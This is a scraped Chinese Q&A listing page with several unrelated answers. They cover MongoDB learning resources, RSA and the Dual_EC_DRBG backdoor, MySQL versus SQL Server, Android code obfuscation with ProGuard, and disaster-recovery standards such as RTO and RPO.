MongoDB背后的公司,10gen推出了免费的&a href=&///?target=https%3A//& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&10gen Education&i class=&icon-external&&&/i&&/a&,这是我看到的最好的在线教程,没有之一。 现在已经有好几种在线课程了,课程设计非常用心。拿MongoDB for Developers来说,它在mongo shell之外使用python教学,但并不要求有python经验。7周的课程中,从安装开始,带领你用python写出一个以MongoDB为数据库的博客。每周的课程都有小作业,写写代码,答答题。除了在实践中学习,课程也涵盖了开发者需要知道的各方面细节,全面深入。另外,还有对 Foursquare 和 Codecademy 的采访,讲他们的使用经验和演变过程。&br&
不方便的地方就是,视频放在youtube上,只有英文字幕。但是作为一个NB程序员,翻墙和英语这两个技能是必需的吧……期待有中文字幕放在youku上,或许看了之后,我们也可以来翻译。&/li&&li&进阶&br&
基本概念和用法都知道了之后,就像楼上说的,在项目试试。&a href=&///?target=http%3A//docs.mongodb.org/manual/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&MongoDB的文档&i class=&icon-external&&&/i&&/a&绝对是最好的地方。它有一些&a href=&///?target=http%3A//cn.docs.mongodb.org/manual/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&中文翻译&i class=&icon-external&&&/i&&/a&。他们很欢迎社区贡献翻译。这时候相互之间的交流很重要,来知乎和segmentfault参与讨论呗。(PS:大家还知道别的活跃中文MongodDB在线社区不?)上stackoverflow看看,官方的google group提问题都是好办法。市面上有一些书也很好,比如《MongoDB权威指南》。&/li&&li&大牛&br&
还没到这个水平,不知道了……程显峰和楼上NoSQLfan的iammutex是国内比较早的先驱了。大家有什么推荐的大牛,我在这里和微博上follow一下……&/li&&/ol&
MongoDB背后的公司,10gen推出了免费的,这是我看到的最好的在线教程,没有之一。 现在已经有好几种在线课程了,课程设计非常用心。拿MongoDB for Developers来说,它在mongo shell之外使用python教学,但并不要求有python经验。7周的…
来自子话题:
我来贡献一个简单的版本:&br&&br&1、RSA是目前最为流行的&b&公钥加密算法&/b&,也称之为&b&非对称加密算法&/b&。是RSA公司发明的。&br&2、到目前为止,RSA算法并未发现任何缺陷。&br&3、RSA和其他加密算法一样,是基于密钥的(只不过密钥有两个,公钥和私钥)。为了确保安全,密钥是采用某种伪随机函数(纯机械运算没有所谓的“真”随机函数)生成的。&br&4、RSA公司推出的BSafe安全软件,提供了RSA加解密,以及密钥自动产生等功能。&br&5、但是BSafe软件产生密钥所使用的算法Dual_EC_DRBG,已经被研究人员确认为是可能存在后门的算法。事实上这已经意味着BSafe软件产生的密钥并不安全了(这在2007年)。但RSA算法还是安全的。&br&6、目前最新的进展是,斯诺登披露的文件证明了,美国国家安全局(NSA)通过贿赂RSA公司,使其在BSafe安全软件中采用Dual_EC_DRBG算法。而Dual_EC_DRBG则是NSA精心设计的留有后门的算法(当然NSA可能没有告诉RSA公司这一点)。&br&7、事实上根据RSA算法的设计,如果没有在&b&数论上有重大突破&/b&,那么几乎是不可能被破解的。目前所谓的破解,更多的是针对RSA密钥的直接破解,例如在密钥生成算法中植入后门,也就是Dual_EC_DRBG算法,或者监听CPU在加密时产生的噪声来推测所使用的密钥。这些方式的局限性在于必须侵入加密过程之前或之中,一旦加密完成,目前没有已知的办法破解。所以RSA目前还是相对安全的。&br&8、未来RSA可能的挑战有两个,即数论上出现&b&重大突破&/b&,或者计算机&b&计算能力暴增&/b&。
我来贡献一个简单的版本:1、RSA是目前最为流行的公钥加密算法,也称之为非对称加密算法。是RSA公司发明的。2、到目前为止,RSA算法并未发现任何缺陷。3、RSA和其他加密算法一样,是基于密钥的(只不过密钥有两个,公钥和私钥)。为了确保安全,密钥是采用…
来自子话题:
这种问题最好详细评估一下再做决定了。虽然mysql是免费开源的,但是转换代价可能比直接购买sql server+win都高。&br&至于效率问题,myspace就是使用的.net+sql server,网上也能搜到相关的文章。支持高并发是没有问题的。myspace的网页加载速度不高也并非数据库的原因。而且购买sql server的钱中,包含一定的服务项目和技术支持。&br&转向mysql+*nix,很多在win平台容易上手的问题,包括服务器、数据库的优化等问题都需要经验丰富的人带领。mysql的优势更多在于高并发存取,对于一些关联查询、子查询的计算问题,比不上sql server,用惯sql server的人可能会不太习惯。后期人才招聘、培养、流失的费用,很可能会大大超过软件购买费用。&br&如果是有合适的人才,有经验丰富的架构师带队,可以考虑更换。如果仅仅为了费用,那真得深思熟虑才好。
这种问题最好详细评估一下再做决定了。虽然mysql是免费开源的,但是转换代价可能比直接购买sql server+win都高。至于效率问题,myspace就是使用的.net+sql server,网上也能搜到相关的文章。支持高并发是没有问题的。myspace的网页加载速度不高也并非数据库…
来自子话题:
看到这么多人&b&安全意识这么差&/b&,认为混淆没什么卵用也就见怪不怪了。&br&从整个安全行业来讲,很多企业都不注重安全引发的问题少么?想想最近的网易。&br&再看看乌云上的曝光的各种漏洞,有多少是因为安全意识不行引起的。&br&&br&不混淆可以认为这个企业的安全意识差,开发人员意识不好。&br&&br&前面有同学提到混淆会带来额外开销,拜托,看下官方文档好么?&br&&blockquote&The &a href=&///?target=http%3A//proguard.sourceforge.net/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&ProGuard&i class=&icon-external&&&/i&&/a& tool shrinks, optimizes, and obfuscates your code by removing unused code and renaming classes, fields, and methods with semantically obscure names. The result is a smaller sized .apkfile that is more difficult to reverse engineer. Because ProGuard makes your application harder to reverse engineer, it is important that you use it when your application utilizes features that are sensitive to security like when you are &a href=&///?target=http%3A///google/play/licensing/index.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Licensing Your Applications&i class=&icon-external&&&/i&&/a&.&/blockquote&&a href=&///?target=http%3A///intl/zh-cn/tools/help/proguard.html& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/i&/span&&span class=&invisible&&ntl/zh-cn/tools/help/proguard.html&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&blockquote&Proguard通过移除没有用到的代码以及通过特定规则重命名类、变量、方法来压缩、优化、混淆你的代码。这样做可以让你的apk更小,更难被逆向分析。由于可以提高被逆向分析的难度,对相关功能安全敏感的应用使用它是十分必要的。&/blockquote&简单的移除没用到的类以及重命名,哪里会带来性能开销了,哪里带来卡顿了。&br&不是加固好么?加固对性能会有影响,这是由于大部分的加固的原理都是运行时解密相关资源的。&br&&br&然后说大众点评没有混淆的,混淆容易导致问题,看看微信,QQ ,支付宝这些亿级用户量的产品,学学它们,不要老是盯着大众点评。&br&&br&没有什么卵用,Google闲着蛋疼支持这玩意啊。&br&&br&&b&这不是能力问题,是安全意识,培养一个好的安全意识不好么?&/b&等到某一天终于做一个跟钱打交道的应用,却发现没混淆带来大量损失才后悔莫及?&br&&br&混淆是必要,当然有些时候特殊需求,比如说热修复,需要用到反射,可能相关的类不会被混淆。但完全不混淆就是开玩笑好么?&br&&br&被破解是无法避免的事情,只是难度问题而已。破解与保护,互生互灭。能提高一点是一点。&br&代码确实不值钱,反正家里啥都没有,就几件破衣服,随便拿吧。&br&&br&这次蜻蜓FM的事情如果混淆了,会被扒的这么彻底么?想想?从&b&单纯的职业道德&/b&来讲,是不是为企业避免了不少损失?&br&&br&&b&另外,混淆不需要太多时间,快半天,慢2-3天就完全可以搞定,而且一次混淆,多次复用(其他项目稍作调整即可)。&/b&&br&以上。
看到这么多人安全意识这么差,认为混淆没什么卵用也就见怪不怪了。从整个安全行业来讲,很多企业都不注重安全引发的问题少么?想想最近的网易。再看看乌云上的曝光的各种漏洞,有多少是因为安全意识不行引起的。不混淆可以认为这个企业的安全意识差,开发人…
来自子话题:
对的,所以你知道为什么手机上很多银行的应用输入密码的框框长得跟别处不一样了:禁用第三方输入法甚至系统输入法从而减小攻击面 (attack surface)。这也是我为什么从来不用任何所谓「云输入法」的原因:就好像一直有个人在背后盯着你敲键盘一样不靠谱。
对的,所以你知道为什么手机上很多银行的应用输入密码的框框长得跟别处不一样了:禁用第三方输入法甚至系统输入法从而减小攻击面 (attack surface)。这也是我为什么从来不用任何所谓「云输入法」的原因:就好像一直有个人在背后盯着你敲键盘一样不靠谱。
来自子话题:
哎?我什么时候安的?!!
哎?我什么时候安的?!!
来自子话题:
&b&更新,我重新咨询了几个在业内从业经验超过10年的人,他们表明现在的热备同城/异地冗余切换根本达不到应有的标准,零点几秒的延迟也会造成重要数据的损失。所以下面的观点部分是错误的。&/b&&br&&br&作为一个有几年系统集成经验的销售来回答这个问题,负责过一些比较大的数据中心的项目。&br&没有程序员的经验所以只从系统集成以及运维的管理这两个回答问题,有异议可以讨论,请轻喷。&br&&br&阿里和携程的事故教育我们一些大型的互联网公司并不重视最基本也是最简单的服务器以及存储数据的灾备。说直白点儿就是前后端都很牛逼,但IT是一坨翔有个卵用。现在看互联网公司招聘上市公司也好创业公司也好,大家都在招前端后端产品UI,但鲜有公司有IT部门的招聘需求,就算有工资也远远低于其他岗位。在五百强或者央企等大型企业IT虽然是行政部门,但每年掌握的经费是非常充足的。&br&&br&根本上讲这些问题并不是很高层次的技术问题,是可以从源头尽量掐死的,根源就是在管理上以及系统集成的解决方案上制定并执行一个严格的准则。从管理上讲要明确运维的权限以及责任,制定持续的防灾测试以及维护计划。从系统搭建方面讲做好风险评估、业务影响分析、及可恢复性评估,并且尽可能的多投入防灾方面的经费。&br&&br&曾经为某央企做过一个大概20T存储需求的小NAS集群项目,为了数据迁移以及防灾和旧存储的持续利用,三家厂商提供了六套以上的解决方案,但共同点都是双机热备和异地容灾。&br&&br&&br&这两次事故给我们的教训是一定不能在IT上省钱!一定不能再解决方案上省钱!一定不能在运维上省钱!&br&大公司要找一个真正懂DATA BASE的人来做机房管理设备采购以及运维!当然BAT可以招牛B的设计来做自己的节点架构。中小公司可以外包给好的远程运维或者运维服务团队来做维护以及防灾!&br&&br&&b&以下是前公司的关于异地容灾备份的介绍:&/b&&br&根据国际标准SHARE78的定义,灾难恢复解决方案根据方案的成本和将带来的效益程度不同而分为七级,这将方案的成本和RTO和RPO联系在一起&br&是&strong&RTO (Recovery Time Objective):&/strong&是指灾难发生后,从I/T系统停机导致业务停顿开始,到IT系统恢复可以支持业务恢复运营之时,所需要的时间&br&&strong&RPO (Recovery Point Objective):&/strong&发生意外灾难事件时可能丢失的数据量。是指能够恢复至可以支持业务运作,系统及数据恢复到怎样的更新程度—可以是上一周的备份数据,也可以是上一次交易的实时数据。&br&&br&在此基础上,灾难备份技术方案可以分为四种类别考虑规划:&br&&strong&关键业务应用灾难备份方案(热备份)&/strong&&br&关键业务应用灾难备份方案对应国际标准SHARE 78的定义灾难备份技术方案的第7级,在对数据提供最高级别的保护的基础上,增加了自动化功能,在出现问题或发生灾难时发出报警,一旦客户决定把应用切换到灾难备份中心,则自动完成灾难备份中心应用启动需要的各个操作步骤,保证业务在最短的时间内恢复。&br&&ul&&li&&strong&适用环境:&/strong&&br&RPO ≈0,没有或基本没有数据丢失;&br&RTO & 1h,应用恢复时间在1~2个小时内;&/li&&li&&strong&技术方案:&/strong&&br&- 专用的,活动的灾备中心&br&- 最高级别的业务连续性&br&- 端到端的灾备服务,包括应用和流程&br&- 自动监测应用运行状态&br&- 自动完成应用和业务切换&/li&&/ul&&strong&存储为中心的灾难备份方案(温备份)&/strong&&br&存储为中心的灾难备份基本对应国际标准SHARE 78的定义灾难备份技术方案的第5和第6级,采用数据复制技术,是对数据进行保护的数据最高级别灾难备份方案。&br&&ul&&li&&strong&适用环境:&/strong&&br&RPO ≈0 ,对于非常重要的数据,没有或基本没有数据丢失;&br&RTO& 4h,应用恢复时间在几个小时内;&/li&&li&&strong&技术方案:&/strong&&br&- 专用的灾备中心&br&- 数据的最高级别保护 – 没有或基本没有数据丢失&br&- 采用同步(同城近距离)或异步(不受限制远距离)磁盘镜像技术,与应用无关&br&- 灾难时根据预先定义的流程,手工恢复&/li&&/ul&&strong&中等程度应用灾难备份方案(冷备份)&/strong&&br&中等重要程度应用灾难备份方案对应国际标准SHARE 78的定义灾难备份技术方案的第3和第4级。&br&&ul&&li&&strong&适用环境:&/strong&&br&RPO ≤24h, 对于比较重要的数据,允许的数据丢失量在1天以内;&br&RTO ≤24h ,应用恢复时间在1天以内;&/li&&li&&strong&技术方案:&/strong&&br&- 建立灾备中心&br&- 重要数据一天内进行多次备份,备份数据通过网络异步传输到备份中心&br&- 制定备份策略,利用数据备份软件和工具进行备份&br&- 灾难时根据预先定义的流程,手工恢复&/li&&/ul&&strong&数据磁带远程传送灾难备份方案(无应用备份)&/strong&&br&数据磁带远程传送方案对应国际标准SHARE 78的定义灾难备份技术方案的第1和第2级,是最基本的磁带备份解决方案。&br&&ul&&li&&strong&适用环境:&/strong&&br&RPO ≥24h ,允许的数据丢失量在1天;&br&RTO >24h ,应用恢复时间在1天以上;&/li&&li&&strong&技术方案:&/strong&&br&- 不需要自己建立灾备中心&br&- 把数据的备份介质运输到保存地&br&- 发生灾难时,采用数据中心外包或使用第三方机房恢复数据和应用&/li&&/ul&如果完全按照这个标准制定解决方案以及维护方案基本可以避免造成停机一天以及丢失大量数据灾难。
更新,我重新咨询了几个在业内从业经验超过10年的人,他们表明现在的热备同城/异地冗余切换根本达不到应有的标准,零点几秒的延迟也会造成重要数据的损失。所以下面的观点部分是错误的。作为一个有几年系统集成经验的销售来回答这个问题,负责过一些比较大…
来自子话题:
每天上下班4小时,家里断网,手机流量费贵的一逼。&br&这种情况下给你免费的书看&br&4年后不破千你打我。&br&&br&你说技术书?能读通10本都不错了……
每天上下班4小时,家里断网,手机流量费贵的一逼。这种情况下给你免费的书看4年后不破千你打我。你说技术书?能读通10本都不错了……
来自子话题:
如果你修炼到看汇编就跟看编译前的C语言一样容易的话,那对你来说所有软件全部是开源的,而且可以随便改。只要你有精力,就一定能破解。
如果你修炼到看汇编就跟看编译前的C语言一样容易的话,那对你来说所有软件全部是开源的,而且可以随便改。只要你有精力,就一定能破解。
来知乎,参与讨论}

我要回帖

更多关于 itouch可以发短信吗 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信